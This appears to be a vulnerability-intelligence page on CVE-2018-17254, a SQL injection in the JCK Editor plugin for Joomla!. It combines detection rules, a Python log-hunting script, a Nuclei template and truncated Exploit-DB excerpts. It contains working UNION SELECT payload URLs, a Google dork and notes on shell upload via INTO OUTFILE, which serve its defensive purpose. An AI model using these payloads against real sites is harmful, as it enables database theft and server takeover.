CVE-2018-17254
Published 2018-09-20
CVE-2018-17254: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
Priority P188 · critical · 9.8 CVSS 3.1
AV:N · AC:L · PR:N · UI:N · S:U · C:H · I:H · A:H
ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 82.98% (99.6th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| arkextensions | jck_editor | — | — |
Detection & IOCs (extracted from sources)
url: /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20aa
command: GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5({{num}})),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1
snort:
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT JCK Editor 6.4.4 SQLi Attempt (CVE-2018-17254)"; flow:established,to_server; http.method; content:"GET"; nocase; http.uri; content:"/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php"; nocase; content:"extension=menu"; distance:0; content:"view=menu"; nocase; content:"parent="; nocase; pcre:"/parent=[^&]*(?:S(?:HOW.+(?:C(?:HARACTER.+SET|UR(DATE|TIME))|(?:VARI|T)ABLES)|ELECT.+(?:FROM|USER))|U(?:NION.+SELEC|PDATE.+SE)T|DELETE.+FROM|INSERT.+INTO|\/\*.+\*\/|EXEC)/Ui"; reference:url,www.exploit-db.com/exploits/49627; reference:cve,2018-17254; classtype:attempted-admin; sid:2033604; rev:1; metadata:attack_target Client_Endpoint, created_at 2021_07_28, cve CVE_2018_17254, deployment Perimeter, confidence High, signature_severity Major, tag Exploit, updated_at 2021_07_28;)
- Google dork can be used to identify exposed vulnerable endpoints on the internet
- Exploit checks for successful injection by injecting hex-encoded string 0x6861636b6564 ('hacked') and verifying the base64-encoded response equals 'aGFja2Vk'
- RCE shell upload attempts write a randomly-named .php file to common web roots via SQL INTO OUTFILE; detect unexpected .php file creation under web root paths
- Nuclei template detection: match md5 hash of a known numeric value in HTTP response body to confirm blind UNION-based SQLi success
- ET EXPLOIT Snort SID 2033604 fires on GET requests to the vulnerable path with SQL keywords in the parent parameter; deploy at perimeter
- The RCE via INTO OUTFILE will likely fail unless the MySQL user has FILE privilege and the web root is writable; the exploit itself notes this
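For retro-hunting in stored web server logs, where the perimeter rule was not deployed at the time, the same matching logic can be applied offline. The script below is an added example, not part of the ET rule or of any source quoted on this page; it assumes Apache/nginx common or combined log format, reuses the keyword alternation from the pcre in SID 2033604, and runs over constructed sample log lines. The function names (decode, classify, hunt) are hypothetical.

```python
import re
from urllib.parse import unquote_plus

VULN_PATH = "/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php"
# SQL keyword alternation copied from the pcre in SID 2033604.
SQL_RE = re.compile(
    r"S(?:HOW.+(?:C(?:HARACTER.+SET|UR(?:DATE|TIME))|(?:VARI|T)ABLES)"
    r"|ELECT.+(?:FROM|USER))|U(?:NION.+SELEC|PDATE.+SE)T|DELETE.+FROM"
    r"|INSERT.+INTO|/\*.+\*/|EXEC", re.I)
# Assumed log layout: client IP first, then a quoted request line and the status.
REQ_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def decode(value, rounds=2):
    """URL-decode up to `rounds` times so double-encoded input is still seen."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return (verdict, client_ip, status) for requests to the endpoint, else None."""
    m = REQ_RE.search(line)
    if not m:
        return None
    path, _, query = m["uri"].partition("?")
    if VULN_PATH not in decode(path).lower():   # Joomla may live in a subdirectory
        return None
    parents = [decode(p.partition("=")[2]) for p in query.split("&")
               if p.lower().startswith("parent=")]
    verdict = "sqli-attempt" if any(SQL_RE.search(v) for v in parents) else "endpoint-access"
    return verdict, m["ip"], int(m["status"])

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    f'203.0.113.7 - - [08/Mar/2021:10:01:02 +0000] "GET {VULN_PATH}?extension=menu&view=menu&parent=%22%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1" 200 512',
    f'198.51.100.23 - - [08/Mar/2021:10:05:40 +0000] "GET /site{VULN_PATH}?extension=menu&view=menu&parent=%2522%2520UnIoN%2520SeLeCt%2520NULL HTTP/1.1" 404 209',
    f'192.0.2.10 - - [08/Mar/2021:10:07:11 +0000] "GET {VULN_PATH}?extension=menu&view=menu&parent=12 HTTP/1.1" 200 1840',
    '192.0.2.10 - - [08/Mar/2021:10:07:12 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 5120',
]

def hunt(lines):
    """Classify every line and keep only requests that touched the endpoint."""
    return [r for r in map(classify, lines) if r]

if __name__ == "__main__":
    for verdict, ip, status in hunt(SAMPLE_LOG):
        print(f"{verdict:16} {ip:15} HTTP {status}")
```

A sqli-attempt answered with HTTP 200 is the case to triage first; endpoint-access hits show where the plugin is reachable at all.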
CVSS provenance
nvd · v3.1 · 9.8 CRITICAL · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd · v2.0 · 7.5 HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck · 9.8 CRITICAL
GHSA
GHSA-fhwf-3vmf-vx8q: The JCK Editor component 6
ghsa_unreviewed·2022-05-13
CVE-2018-17254 [CRITICAL] CWE-89 GHSA-fhwf-3vmf-vx8q: The JCK Editor component 6
The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
VulnCheck
arkextensions jck_editor Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck·2018·CVSS 9.8
The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
Affected: arkextensions jck_editor
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://viz.greynoise.io/tags/jck-editor-sql-injection-cve-2018-17254-sqli-attempt
Exploit PoC: https://vulncheck.com/xdb/8ed7b2c9bb2a; https://vulncheck.com/xdb/5bb757ccb3aa
Suricata
ET EXPLOIT JCK Editor 6.4.4 SQLi Attempt (CVE-2018-17254)
suricata·2021-07-28·CVSS 9.8
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT JCK Editor 6.4.4 SQLi Attempt (CVE-2018-17254)"; flow:established,to_server; http.method; content:"GET"; nocase; http.uri; content:"/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php"; nocase; content:"extension=menu"; distance:0; content:"view=menu"; nocase; content:"parent="; nocase; pcre:"/parent=[^&]*(?:S(?:HOW.+(?:C(?:HARACTER.+SET|UR(DATE|TIME))|(?:VARI|T)ABLES)|ELECT.+(?:FROM|USER))|U(?:NION.+SELEC|PDATE.+SE)T|DELETE.+FROM|INSERT.+INTO|\/\*.+\*\/|EXEC)/Ui"; reference:url,www.exploit-db.com/exploits/49627; reference:cve,2018-17254; classtype:attempted-admin; sid:2033604; rev:1; metadata:attack_target Client_Endpoint, created_at 2021_07_28,
Exploit-DB
Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)
exploitdb·2021-03-08·CVSS 9.8
---
# Exploit Title: Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)
# Google Dork: inurl:/plugins/editors/jckeditor/plugins/jtreelink/
# Date: 05/03/2021
# Exploit Author: Nicholas Ferreira
# Vendor Homepage: http://docs.arkextensions.com/downloads/jck-editor
# Version: 6.4.4
# Tested on: Debian 10
# CVE : CVE-2018-17254
# PHP version (exploit): 7.3.27
# POC: /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20aa
/', $request, $output);
return $output;
}
######
function is_vulnerable($url){
global $vuln_file;
$output = inject($url, payload("0x6861636b6564"));
if(isset($output[1][0])){
if(base64_encode($output[1][0])
Exploit-DB
Joomla! Component JCK Editor 6.4.4 - 'parent' SQL Injection
exploitdb·2018-09-17
---
# Title: Joomla Component JCK Editor 6.4.4 - 'parent' SQL Injection
# Date: 2018-09-14
# Exploit Author: Hamza Megahed
# Vendor Homepage:https://www.joomla.org/
# Download: https://arkextensions.com/products/jck-editor
# Version: 6.4.4
# Tested on: Ubuntu, FireFox,
# CVE: N/A
# Parameter = parent
# Payload = " UNION SELECT NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL -- aa
# Poc:
Test = [HOST]/[PATH]/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=%22%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20aa
Nuclei
Joomla! JCK Editor SQL Injection
nuclei·CVSS 9.8
The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
Template:
id: CVE-2018-17254
info:
  name: Joomla! JCK Editor SQL Injection
  author: Suman_Kar
  severity: critical
  description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
  remediation: Update or remove the affected plugin.
  reference:
    - http://packetstormsecurity.com/files/161683/Joomla-JCK-Editor-6.4.4-SQL-Injection.html
    - https://www.exploit-db.com/exploits/45423/
    - https://git